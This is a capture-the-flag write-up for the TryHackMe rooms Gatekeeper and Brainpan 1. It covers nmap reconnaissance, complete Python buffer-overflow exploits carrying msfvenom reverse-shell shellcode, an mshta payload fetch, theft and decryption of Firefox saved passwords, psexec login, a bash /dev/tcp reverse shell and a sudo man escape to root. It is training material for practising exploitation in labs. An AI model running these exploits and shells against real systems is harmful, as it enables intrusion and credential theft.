Table of contents
Open Table of contents
Intro
I would like to share my write-ups for two Rooms from Tryhackme:
- Brainpan 1
- Gatekeeper
I recommend them for practicing Buffer Overflow.
Gatekeeper
Reconaisance
NMAP
nmap -p- -T4 10.10.128.147 -v
nmap -p135,139,445,3389,31337,49153,49155,49165,49161 -sS -sC -sV 10.10.128.147 -v
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ms-wbt-server?
|_ssl-date: 2024-07-03T08:21:28+00:00; -37s from scanner time.
| rdp-ntlm-info:
| Target_Name: GATEKEEPER
| NetBIOS_Domain_Name: GATEKEEPER
| NetBIOS_Computer_Name: GATEKEEPER
| DNS_Domain_Name: gatekeeper
| DNS_Computer_Name: gatekeeper
| Product_Version: 6.1.7601
|_ System_Time: 2024-07-03T08:21:23+00:00
| ssl-cert: Subject: commonName=gatekeeper
| Issuer: commonName=gatekeeper
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2024-07-02T07:55:11
| Not valid after: 2025-01-01T07:55:11
| MD5: 7429:53a0:0368:166c:15cf:cb11:98ef:eb89
|_SHA-1: e80b:3a5b:4c22:c8bf:7e88:a920:3dc9:050f:71a0:5cfd
31337/tcp open Elite?
| fingerprint-strings:
| FourOhFourRequest:
| Hello GET /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
| Hello
| GenericLines:
| Hello
| Hello
| GetRequest:
| Hello GET / HTTP/1.0
| Hello
| HTTPOptions:
| Hello OPTIONS / HTTP/1.0
| Hello
| Help:
| Hello HELP
| Kerberos:
| Hello !!!
| LDAPSearchReq:
| Hello 0
| Hello
| LPDString:
| Hello
| default!!!
| RTSPRequest:
| Hello OPTIONS / RTSP/1.0
| Hello
| SIPOptions:
| Hello OPTIONS sip:nm SIP/2.0
| Hello Via: SIP/2.0/TCP nm;branch=foo
| Hello From: <sip:nm@nm>;tag=root
| Hello To: <sip:nm2@nm2>
| Hello Call-ID: 50000
| Hello CSeq: 42 OPTIONS
| Hello Max-Forwards: 70
| Hello Content-Length: 0
| Hello Contact: <sip:nm@nm>
| Hello Accept: application/sdp
| Hello
| SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|_ Hello
49153/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Host script results:
| smb2-time:
| date: 2024-07-03T08:21:22
|_ start_date: 2024-07-03T07:54:08
| nbstat: NetBIOS name: GATEKEEPER, NetBIOS user: <unknown>, NetBIOS MAC: 02:85:b5:41:95:d1 (unknown)
| Names:
| GATEKEEPER<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| GATEKEEPER<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
|_clock-skew: mean: 47m22s, deviation: 1h47m19s, median: -37s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: gatekeeper
| NetBIOS computer name: GATEKEEPER\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-07-03T04:21:22-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
Port 31337
Some service at this port.
nc -nv 10.10.128.147 31337
some value
# returns
Hello some value!!!
SMB
Executable is here.
smbclient -L \\\\10.10.128.147\\Users
# get gatekeeper.exe
Buffer Overflow
Downloaded gatekeeper.exe
, and run on immunity debugger.
The resulting code
#!/bin/python3
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '172.25.0.2'
port = 31337
s.connect((ip, port))
postfix = b'\r\n'
### OFFSET
# https://wiremask.eu/tools/buffer-overflow-pattern-generator
pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9'
# Result = 146
offset = b'a'*146
# next 4 is EIP
### BAD CHARS
# !mona ba
allchars = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# message = offset + "000000" + allchars + postfix
# !mona cmp -f bytearray.bin -a <address where 01020304 starts>
# 00 0a 80
### JMP
# !mona modules
# !mona jmp -r esp -m <some module>
# take some address from there
jmp = b"\xc3\x14\x04\x08"
### NOPS
nops = b'\x90'*16
# msfvenom -p windows/shell_reverse_tcp LHOST=172.25.0.1 LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x80" -f py
buf = b""
buf += b"\xbe\x94\x19\x47\x11\xda\xd1\xd9\x74\x24\xf4\x5d"
buf += b"\x33\xc9\xb1\x52\x31\x75\x12\x03\x75\x12\x83\x79"
buf += b"\xe5\xa5\xe4\x7d\xfe\xa8\x07\x7d\xff\xcc\x8e\x98"
buf += b"\xce\xcc\xf5\xe9\x61\xfd\x7e\xbf\x8d\x76\xd2\x2b"
buf += b"\x05\xfa\xfb\x5c\xae\xb1\xdd\x53\x2f\xe9\x1e\xf2"
buf += b"\xb3\xf0\x72\xd4\x8a\x3a\x87\x15\xca\x27\x6a\x47"
buf += b"\x83\x2c\xd9\x77\xa0\x79\xe2\xfc\xfa\x6c\x62\xe1"
buf += b"\x4b\x8e\x43\xb4\xc0\xc9\x43\x37\x04\x62\xca\x2f"
buf += b"\x49\x4f\x84\xc4\xb9\x3b\x17\x0c\xf0\xc4\xb4\x71"
buf += b"\x3c\x37\xc4\xb6\xfb\xa8\xb3\xce\xff\x55\xc4\x15"
buf += b"\x7d\x82\x41\x8d\x25\x41\xf1\x69\xd7\x86\x64\xfa"
buf += b"\xdb\x63\xe2\xa4\xff\x72\x27\xdf\x04\xfe\xc6\x0f"
buf += b"\x8d\x44\xed\x8b\xd5\x1f\x8c\x8a\xb3\xce\xb1\xcc"
buf += b"\x1b\xae\x17\x87\xb6\xbb\x25\xca\xde\x08\x04\xf4"
buf += b"\x1e\x07\x1f\x87\x2c\x88\x8b\x0f\x1d\x41\x12\xc8"
buf += b"\x62\x78\xe2\x46\x9d\x83\x13\x4f\x5a\xd7\x43\xe7"
buf += b"\x4b\x58\x08\xf7\x74\x8d\x9f\xa7\xda\x7e\x60\x17"
buf += b"\x9b\x2e\x08\x7d\x14\x10\x28\x7e\xfe\x39\xc3\x85"
buf += b"\x69\xea\x0d\x85\x68\x9a\x2f\x85\x7b\x06\xb9\x63"
buf += b"\x11\xa6\xef\x3c\x8e\x5f\xaa\xb6\x2f\x9f\x60\xb3"
buf += b"\x70\x2b\x87\x44\x3e\xdc\xe2\x56\xd7\x2c\xb9\x04"
buf += b"\x7e\x32\x17\x20\x1c\xa1\xfc\xb0\x6b\xda\xaa\xe7"
buf += b"\x3c\x2c\xa3\x6d\xd1\x17\x1d\x93\x28\xc1\x66\x17"
buf += b"\xf7\x32\x68\x96\x7a\x0e\x4e\x88\x42\x8f\xca\xfc"
buf += b"\x1a\xc6\x84\xaa\xdc\xb0\x66\x04\xb7\x6f\x21\xc0"
buf += b"\x4e\x5c\xf2\x96\x4e\x89\x84\x76\xfe\x64\xd1\x89"
buf += b"\xcf\xe0\xd5\xf2\x2d\x91\x1a\x29\xf6\xb1\xf8\xfb"
buf += b"\x03\x5a\xa5\x6e\xae\x07\x56\x45\xed\x31\xd5\x6f"
buf += b"\x8e\xc5\xc5\x1a\x8b\x82\x41\xf7\xe1\x9b\x27\xf7"
buf += b"\x56\x9b\x6d"
message = offset + jmp + nops + buf + postfix
s.send(message)
r = s.recv(1024).decode('utf-8', errors='replace')
print(offset)
print(r)
s.close()
# Notes:
# 1. do not write utf-8 in s.send
# 2. use breakpoints on debugger to follow the code
# 3. you fuond some badchars. Do not Forget to check consequent ones, one can mislead.
──(kali㉿kali)-[~/work]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.35.156] from (UNKNOWN) [10.10.187.204] 49156
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\natbat\Desktop> type user.txt.txt
{H4lf_W4y_Th3r3}
PrivEsc
Get better shell
msfconsole
# then
use exploit/windows/misc/hta_server
set lhost 10.8.35.156
run
# then in windows
mshta http://10.8.35.156:8080/2ao4a48kDfJgdCl.hta
There is firefox link in desktop, maybe dump some creds. Download some files and
meterpreter > download key4.db\
>
[*] Downloading: key4.db -> /home/kali/work/key4.db
[*] Downloaded 288.00 KiB of 288.00 KiB (100.0%): key4.db -> /home/kali/work/key4.db
[*] Completed : key4.db -> /home/kali/work/key4.db
meterpreter > download logins.json
[*] Downloading: logins.json -> /home/kali/work/logins.json
[*] Downloaded 600.00 B of 600.00 B (100.0%): logins.json -> /home/kali/work/logins.json
[*] Completed : logins.json -> /home/kali/work/logins.json
meterpreter > pwd
C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release
meterpreter >
Use following tool:
- https://github.com/lclevy/firepwd (clone and pip install)
python3 firepwd.py --dir=<dir with the files>
https://creds.com:b'mayor',b'8CL7O1N78MdrCIsV'
┌──(kali㉿kali)-[~/work]
└─$ impacket-psexec gatekeeper/mayor:[email protected]
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 10.10.187.204.....
[*] Found writable share ADMIN$
[*] Uploading file uVRIkfPy.exe
[*] Opening SVCManager on 10.10.187.204.....
[*] Creating service pdvB on 10.10.187.204.....
[*] Starting service pdvB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Users\mayor\Desktop> type root.txt.txt
{Th3_M4y0r_C0ngr4tul4t3s_U}
Brainpan 1
Reconaisance
NMAP
nmap -p- -T4 10.10.120.151 -v
9999
10000
nmap -p9999,10000 -sS -sC -sV 10.10.120.151 -v
PORT STATE SERVICE VERSION
9999/tcp open abyss?
| fingerprint-strings:
| NULL:
| _| _|
| _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
| _|_| _| _| _| _| _| _| _| _| _| _| _|
| _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
| [________________________ WELCOME TO BRAINPAN _________________________]
|_ ENTER THE PASSWORD
10000/tcp open http SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: GET HEAD
9999
└─$ nc -nv 10.10.120.151 9999
(UNKNOWN) [10.10.120.151] 9999 (?) open
_| _|
_|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
_| _| _|_| _| _| _| _| _| _| _| _| _| _| _|
_| _| _| _| _| _| _| _| _| _| _| _| _| _|
_|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
_|
_|
[________________________ WELCOME TO BRAINPAN _________________________]
ENTER THE PASSWORD
>> a
ACCESS DENIED
10000 - Python Server
- there is some index page only
Dirb
dirb http://10.10.120.151:10000/
# result
/bin
it contains brainpan.exe
executable. Which is most probably is responsible for service at 9999.
9999 - Brainpan.exe
Lets run it on our Windows Machine, and try to exploit it. Simple Reverse Engineering gave me the password:
strings brainpan.exe
shitstorm
It is not that interesting, it gives no access to anything. Soooo…
Buffer Overflow - Brainpan.exe
Lets write a python script to overflow the Buffer! Using Immunity Debugger and mona module.
#!/bin/python3
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ip = '10.10.120.151'
port = 9999
s.connect((ip, port))
r = s.recv(1024).decode('utf-8', errors='replace')
postfix = b'\r\n'
### Pattern to find Offset
pattern = b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
# message = pattern + postfix
# 0x35724134 - 524
offset = b'a'*524
### Badchars
allchars = (
b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# !mona cmp -f bytearray.bin -a <address where 01020304 starts>
# nothing modified
# so only \x00
### JMP
# !mona modules
# !mona jmp -r esp -m brainpan.exe
# 311712f3 -> f3121731
jmp = b'\xf3\x12\x17\x31'
### Nops
nops = b'\x90'*16
### Exploit
# msfvenom -p windows/shell_reverse_tcp LHOST=10.8.35.156 LPORT=4444 EXITFUNC=thread -b "\x00" -f py
buf = b""
buf += b"\xba\xf3\x22\xf8\x90\xd9\xe5\xd9\x74\x24\xf4\x5e"
buf += b"\x29\xc9\xb1\x52\x83\xee\xfc\x31\x56\x0e\x03\xa5"
buf += b"\x2c\x1a\x65\xb5\xd9\x58\x86\x45\x1a\x3d\x0e\xa0"
buf += b"\x2b\x7d\x74\xa1\x1c\x4d\xfe\xe7\x90\x26\x52\x13"
buf += b"\x22\x4a\x7b\x14\x83\xe1\x5d\x1b\x14\x59\x9d\x3a"
buf += b"\x96\xa0\xf2\x9c\xa7\x6a\x07\xdd\xe0\x97\xea\x8f"
buf += b"\xb9\xdc\x59\x3f\xcd\xa9\x61\xb4\x9d\x3c\xe2\x29"
buf += b"\x55\x3e\xc3\xfc\xed\x19\xc3\xff\x22\x12\x4a\xe7"
buf += b"\x27\x1f\x04\x9c\x9c\xeb\x97\x74\xed\x14\x3b\xb9"
buf += b"\xc1\xe6\x45\xfe\xe6\x18\x30\xf6\x14\xa4\x43\xcd"
buf += b"\x67\x72\xc1\xd5\xc0\xf1\x71\x31\xf0\xd6\xe4\xb2"
buf += b"\xfe\x93\x63\x9c\xe2\x22\xa7\x97\x1f\xae\x46\x77"
buf += b"\x96\xf4\x6c\x53\xf2\xaf\x0d\xc2\x5e\x01\x31\x14"
buf += b"\x01\xfe\x97\x5f\xac\xeb\xa5\x02\xb9\xd8\x87\xbc"
buf += b"\x39\x77\x9f\xcf\x0b\xd8\x0b\x47\x20\x91\x95\x90"
buf += b"\x47\x88\x62\x0e\xb6\x33\x93\x07\x7d\x67\xc3\x3f"
buf += b"\x54\x08\x88\xbf\x59\xdd\x1f\xef\xf5\x8e\xdf\x5f"
buf += b"\xb6\x7e\x88\xb5\x39\xa0\xa8\xb6\x93\xc9\x43\x4d"
buf += b"\x74\xfc\x9b\x6e\x18\x68\x9e\x70\x31\x35\x17\x96"
buf += b"\x5b\xd5\x71\x01\xf4\x4c\xd8\xd9\x65\x90\xf6\xa4"
buf += b"\xa6\x1a\xf5\x59\x68\xeb\x70\x49\x1d\x1b\xcf\x33"
buf += b"\x88\x24\xe5\x5b\x56\xb6\x62\x9b\x11\xab\x3c\xcc"
buf += b"\x76\x1d\x35\x98\x6a\x04\xef\xbe\x76\xd0\xc8\x7a"
buf += b"\xad\x21\xd6\x83\x20\x1d\xfc\x93\xfc\x9e\xb8\xc7"
buf += b"\x50\xc9\x16\xb1\x16\xa3\xd8\x6b\xc1\x18\xb3\xfb"
buf += b"\x94\x52\x04\x7d\x99\xbe\xf2\x61\x28\x17\x43\x9e"
buf += b"\x85\xff\x43\xe7\xfb\x9f\xac\x32\xb8\x80\x4e\x96"
buf += b"\xb5\x28\xd7\x73\x74\x35\xe8\xae\xbb\x40\x6b\x5a"
buf += b"\x44\xb7\x73\x2f\x41\xf3\x33\xdc\x3b\x6c\xd6\xe2"
buf += b"\xe8\x8d\xf3"
message = offset + jmp + nops + buf + postfix
s.send(message)
r = s.recv(1024).decode('utf-8', errors='replace')
print(r)
s.close()
┌──(kali㉿kali)-[~/work]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.35.156] from (UNKNOWN) [10.10.120.151] 38969
CMD Version 1.4.1
Z:\home\puck>
Get a Better Shell
It was Linux machine with Windows Emulator.
Z:\home\puck>type checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep brainpan.exe | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
killall wineserver
killall winedevice.exe
fi
/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi
# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then
pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
if [[ ! -z $pid ]]; then
kill -9 $pid
fi
cd /home/puck/web
/usr/bin/python -m SimpleHTTPServer 10000
fi
Somehow trick the machine to give a better shell
Z:\home\puck> /bin/bash -i
Z:\home\puck> bash -i >& /dev/tcp/10.8.35.156/1234 0>&1
Then get even better
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg
PrivEsc
puck@brainpan:~$ sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:~$
puck@brainpan:~$ sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
first runs ip a
, the next runs top
, the last runs man
with sudo privs
For man:
sudo /home/anansi/bin/anansi_util manual man
# Then
!/bin/sh